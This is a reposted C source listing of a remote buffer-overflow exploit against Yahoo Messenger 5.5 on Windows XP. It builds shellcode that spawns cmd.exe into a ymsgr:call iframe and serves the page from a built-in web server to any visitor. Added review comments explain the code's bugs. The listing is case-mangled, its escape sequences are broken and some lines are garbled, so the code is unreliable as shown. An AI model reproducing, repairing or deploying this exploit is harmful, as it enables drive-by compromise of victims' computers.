Yahoo Messenger V5.5 Remote Exploit (DSR-DUCKY.C)


/ *

*

* --- [Remote Yahoo Messenger V5.5 Exploiter on Windows XP] ---

*

* DTORS Security Research (DSR)

* Code by: rave

*

* The buffer loospi

*

* | - <- <- <- |

*

* ^ __________ ^

*

*

* /

#include

#include

#include

#include

#include / * There Are The Usual Header Files * /

#include

#include

#include

#define maxDataSize 555 / * max number of bytes of data * /

#define backlog 200 / * Number of %ified Connections * /

/* NOTE(review): this listing is case-mangled (Static/Char/Printf ...) and
 * every escape sequence is printed as "/ x.." with stray spaces, so none of
 * it compiles as shown.  The comments added below describe the code as
 * printed and hedge wherever the original token cannot be recovered. */

/* TCP port the built-in web server listens on; overridden by the 'P'
 * option in HandleOptions(). */
Static int port = 80;

/ * library entry inside msvcrt.dll to jmp 0xc (eb0c); * /

/* Declared with 8 elements but initialised from a 4-byte string; main()
 * only ever copies 4 bytes out of it (memcpy(..., sraddress, 4)).  The
 * value is a fixed address for one specific msvcrt.dll build, per the
 * comment above, so it is not portable between OS images. */
Char sraddress [8] = "/ x16 / xd8 / xe8 / x77";

/ * This shellcode just executes cmd.exe nothing special here ..

* The Victim Gets a cmd shell on his desktop :) lol! /

* /

Unsigned char shellcode [] =

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ X8B / XEC / X55 / X8B / XEC / X68 / X20 / X68 / X63 / X6D / X64 / X2E / X8D / X45 / XF8 / X50 / XB8"

"/ x44 / x80 / ​​xbf / x77" // 0x78bf8044 <- adress of system ()

"/ XFF / XD0"; // Call System ()

/* NOTE(review): `port` is already defined with an initialiser above; this
 * second (tentative) definition of the same static is redundant and should
 * be removed to avoid confusion. */
Static int port;

/* Prints the DSR banner and the command-line usage text to stdout
 * (the "done"/"failed" style mix of stdout and stderr elsewhere in the file
 * is not used here).
 *
 * @param programname  argv[0] as passed by the caller; unused — none of
 *                     the printed lines interpolate it.
 * NOTE(review): this function only prints; the callers decide whether to
 * exit afterwards (main() does, HandleOptions() does not). */
Void usage (char * programname)

{

Printf ("/ N / t / t ----------------------------------------- -------- / n ");

Printf ("/ T / T / T / TDTORS Security Research (DSR) / N");

Printf ("/ t / t / t / tcode by: rave / n");

Printf ("/ t / t / t / tmail: rave@dttors.net/n");

Printf ("/ t / t ----------------------------------------- ------ / n / n ");

/ * MODIFY Here to Add your USAGE Message When THE Program IS

* Called without arguments * /

/* Two statements on one line in the listing: the separator and the
 * "-p <portnumber>" usage line (the option's exact spelling is garbled). */
Printf ("/ t / t ----------------------------------------- ------ / n / n "); FPRINTF (stdout," / t / tp local webserver server portnumber / n ");

FPRINTF (stdout, "/ t / t-g greatz to: / n / n / N / N / N");

Printf ("/ t / t ----------------------------------------- ------ / n / n ");

}

/ * returns the index of the first argument That is not an option; i.e.

Does Not Start with a Dash OR a SLASH

* /

/* Scans argv[1..] for leading option arguments (those whose first character
 * is '-' or '/') and returns the index of the first argument that is not
 * one, or 0 when every argument was an option.  Side effect: the 'P'
 * option assigns the global `port`.
 *
 * NOTE(review): the `for` header on the next line is truncated in this
 * listing — the loop condition after "i" is missing (presumably i < Argc).
 *
 * @param Argc  argument count as passed to main()
 * @param argv  argument vector as passed to main()
 * @return index of the first non-option argument, or 0 */
INT HandleOptions (int Argc, char * argv [])

{

INT I, FIRSTNONOPTION = 0;

For (i = 1; i

IF (argv [i] [0] == '/' || argv [i] [0] == '-') {

Switch (argv [i] [1]) {

/ * An Argument -? Means Help is Requested * /

/* Prints the usage text but keeps parsing; it does not terminate. */
Case '?':

USAGE (Argv [0]);

Break;

/* NOTE(review): the operator between i and 1 is lost in the listing
 * (presumably i + 1).  The value is read without checking i + 1 < Argc:
 * when this option is the last argument, argv[i + 1] is the terminating
 * NULL and is handed to atoi (undefined behaviour).  atoi also reports no
 * error and does no range check — strtol with errno/endptr plus a
 * 1..65535 check would.  Finally, i is not advanced past the consumed
 * value, so on the next iteration the number itself does not start with
 * a dash, becomes `firstnonoption` and ends the scan. */
Case 'P':

Port = ATOI (Argv [i 1]); Break;

/* stricmp is a Microsoft CRT name (strcasecmp on POSIX).  "Argv [i] 1"
 * has lost its operator in the listing; presumably argv[i] + 1, i.e. the
 * text after the leading dash, compared against "help". */
Case 'h':

IF (! Stricmp (Argv [i] 1, "Help")) {

USAGE (Argv [0]);

Break;

}

/ * If the option --h means anything else

* in Your Application Add Code Here

* Note: This Falls through to the default

* To print an "unknow option" message

* /

/ * Add your option switches here * /

/* Intentional fall-through from 'h' when the text was not "help". */
DEFAULT:

FPRINTF (stderr, "unknown option% S / N", argv [i]);

Break;

}

}

Else {

FirstnonOption = i;

Break;

}

}

Return firstnonoption;

}

/* Program entry point: parses options, writes an index.html in the current
 * directory, then opens a TCP listener on `port` and streams that file to
 * the first client that connects, after which the process exits.
 *
 * NOTE(review): the listing is case-mangled and collapsed; several lines
 * below have lost operators, parentheses or whole tokens and are annotated
 * where that is visible.  Defects present in the code as printed:
 *  - WSAStartup's return value is ignored and WSACleanup is never called;
 *    the listening socket and the accepted socket are never closed.
 *  - HandleOptions' return value (first non-option index) is discarded.
 *  - fopen() failures exit without closing anything; the FILE reopened
 *    inside the accept loop is never fclose'd.
 *  - gets(sd) reads unbounded input into a 555-byte stack buffer; gets()
 *    was removed in C11 — fgets(sd, sizeof sd, stdin) is the replacement.
 *  - exit(0) is reached after the first client, so the while(1) loop never
 *    iterates twice and the final `Return 0` is unreachable.
 *
 * @param Argc  argument count
 * @param argv  argument vector
 * @return 1 when called without arguments; otherwise never returns normally
 *         (exit() is called on every other path) */
Int main (int Argc, char * argv [])

{

File * fptr;

UNSIGNED Char Buffer [5000];

INT offset = 320; // <- the offset off the buffer = 320 x NOP; (AT 321 WHE BEGIN THE INSTRUCTION POINTER CHANGE)

INT FD, FD2, I, Numbytes, Sin_SIZE; / * Files Descriptors * /

Char SD [MaxDataSize]; / * SD WILL STORE Send Text * /

Struct SockAddr_in Server; / * Server's Address Information * /

Struct SockAddr_in Client; / * Client's Address Information * /

Struct Hostent * He; / * Pointer for the host entry * /

Wsadata WSDATA;

/* NOTE(review): two statements on one line; WSAStartup's result is not
 * checked (a non-zero return means no socket call below can succeed). */
WSASTARTUP (0x0101, & wsdata); if (argc == 1) {

/ * If no arguments we call the usage routine and exit * /

USAGE (Argv [0]);

Return 1;

}

/* Return value ignored; only the side effect on `port` is used. */
HandleOptions (Argc, Argv);

FPRINTF (stdout, "creating index.html:");

/* Creates/overwrites INDEX.HTML in the current working directory.
 * Note the inconsistent use of stderr for both "failed" and "done". */
IF ((FPTR = FOPEN ("INDEX.HTML", "W")) == null) {

FPRINTF (stderr, "failed / n");

Exit (1);

} else {

FPRINTF (stderr, "done / n");

}

// Memseting the buffers for preperation

MEMSET (SD, 0x00, MaxDataSize);

/* NOTE(review): the arithmetic operators and the closing parenthesis of
 * the strlen() call are lost in the listing on this line and on the
 * second memcpy() below.  strlen() is applied to an unsigned char array
 * (sign-mismatched pointer argument). */
MEMSET (Buffer, 0x00, Offset 32 Strlen (Shellcode);

MEMSET (Buffer, 0x90, Offset);

// WHE PLACE THE A JMP EBP 0x3 Instuction Inside the Buffer

// TO JUMP over The Eip Changing bytes at the en offset

//

// JMP 0x3

/ / | ____________ ^

Buffer [offset-4] = 0xeb;

Buffer [offset-3] = 0x03;

Memcpy (buffer offset, sraddress, 4);

Memcpy (Buffer Offset 4, Shellcode, Strlen (shellcode);

// here whe Make the index.html

// Whe Open it again if some connects to the expeling server

// and send it over to the VICTIM.

/* NOTE(review): the format string of this fprintf is lost in the listing
 * (only the closing quote and the two 0x22 arguments survive). */
FPRINTF (FPTR, ", 0x22, 0x22);

FPRINTF (FPTR, "");

/* NOTE(review): the remainder of main() is collapsed onto the next three
 * listing lines.  Points to raise there, in order of appearance:
 *  - the "Server.sin_addr.s_addr = ..." assignment is garbled beyond
 *    recovery (presumably INADDR_ANY).
 *  - as printed, bind() lacks the socket-descriptor argument and both the
 *    bind() and accept() casts lack their opening parenthesis — probably
 *    listing artefacts, but the original cannot be confirmed here.
 *  - gethostbyname(inet_ntoa(...)) on an address literal presumably just
 *    echoes the string as h_name; any failure still aborts the server.
 *  - in the read/send loop `SD [Numbytes * SizeOf (Char)] = '\0'` writes
 *    one element past the end of SD when fread() fills all MAXDATASIZE
 *    bytes, since SD has exactly MaxDataSize elements; the loop also
 *    sends strlen(SD) bytes, so a chunk containing a NUL byte is cut
 *    short, and neither fread() nor send() return values are checked.
 *  - the second Printf passes two arguments for a format with one %s
 *    (the extra argument is ignored).
 *  - Gets(sd) is an unbounded read; Fptr is never fclose'd before
 *    exit(0). */
FPRINTF (FPTR, " oohh my god expedition </ title> / n");</p> <p>FPRINTF (FPTR, "<body BGColor =% CBLACK% C>", 0x22, 0x22);</p> <p>FPRINTF (FPTR, "<Body>");</p> <p>FPRINTF (FPTR, "<font color =% C # c0c0c0% c size =% C2% C Face =% Cverdana, Arial, Helvetica, Sans-Serif% C>,</p> <p>0x22, 0X22, 0X22, 0X22, 0X22, 0X22);</p> <p>FPRINTF (FPTR, "<B> DTORS Security Research (DSR) </ b> / n");</p> <p>FPRINTF (FPTR, "<P> Yah000 Messager Version 5.5 Exploit .... </ p> / n");</p> <p>FPRINTF (FPTR, "<pre>"); FPRINTF (FPTR, "<iframe src =% Cymsgr: Call?% s% c> Contach Heaven </ html> </ body> / x00 / x00 / x00", 0x22, Buffer, 0x22);</p> <p>FPRINTF (FPTR, "<iframe src =% chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c> .... </ html></p> <p></ body> / x00 / x00 / x00 ", 0x22, 0x22);</p> <p>Fclose (fptr); // <- Closing Index.html Again</p> <p>// Some extra debuging information</p> <p>FPRINTF (stdout, "using port:% d / n", port);</p> <p>FPrintf (stdout, "/ nstarting server http: // localhost:% d:", port);</p> <p>IF ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {/ * Calls Socket () * /</p> <p>Printf ("Socket () error / n");</p> <p>Exit (1);} else {</p> <p>FPRINTF (stderr, "done / n");</p> <p>}</p> <p>Server.sin_family = af_INet;</p> <p>Server.sin_port = htons (port);</p> <p>Server.sin_addr.s_addr = incddr_Addr = INADDR_Anddr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr_Anddr_Anddr_Addr =</p> <p>MEMSET (Server.sin_Zero, 0, 8); / * Zero the rest of the structure * /</p> <p>IF (Bind (Struct Sockaddr *) & Server, SIZEOF (Struct SockAddr) == - 1) {</p> <p>/ * Calls bind () * /</p> <p>Printf ("Bind () error / n");</p> <p>EXIT (-1);</p> <p>}</p> <p>IF (Listen (FD, Backlog) == -1) {/ * calls listen () * /</p> <p>Printf ("Listen () error / n");</p> <p>EXIT (-1);</p> <p>}</p> <p>While (1) {</p> <p>SIN_SIZE = SIZEOF (struct sockaddr_in);</p> <p>IF ((FD2 = Accept (FD, Struct 
SockAddr *) & Client, & Sin_Size)) == - 1) {</p> <p>/ * Calls acception () * /</p> <p>Printf ("accept () error / n");</p> <p>Exit (1);</p> <p>}</p> <p>IF ((he = gethostByname (inet_ntoa (client.sin_addr)) == null) {</p> <p>Printf ("gethostbyname () error / n");</p> <p>EXIT (-1);</p> <p>}</p> <p>Printf ("You Got a connection from% s (% s) / n",</p> <p>INET_NTOA (Client.sin_ADDR), He-> h_name;</p> <p>/ * Prints Client's IP * /</p> <p>FPRINTF (stdout, "/ nopening index.html for remote user:");</p> <p>IF ((FPTR = FOPEN ("INDEX.HTML", "R")) == null) {fprintf (stderr, "failed / n");</p> <p>Exit (1);</p> <p>} else {</p> <p>FPRINTF (stderr, "done / n");</p> <p>}</p> <p>FPrintf (stdout, "sending the overflow string ...");</p> <p>// reading the index.html file and sending its</p> <p>// contents to the connect Victim</p> <p>While (! feof (fptr)) {</p> <p>Send (FD2, SD, STRLEN (SD), 0);</p> <p>NumBytes = Fread (SD, SIZEOF (CHAR), MAXDATASIZE, FPTR);</p> <p>SD [Numbytes * SizeOf (Char)] = '/ 0';</p> <p>}</p> <p>Send (FD2, SD, STRLEN (SD), 0);</p> <p>Printf ("/ n / n / narxploit done .... 
/ n / n / n");</p> <p>Printf ("A shell is started @% s :) lol / n / n / npress any key to exit the expedition", inet_ntoa (client.sin_addr), he-> h_name;</p> <p>Gets (sd);</p> <p>exit (0);</p> <p>}</p> <p>Return 0;</p> <p>}</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-111318.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="111318" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.053</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" 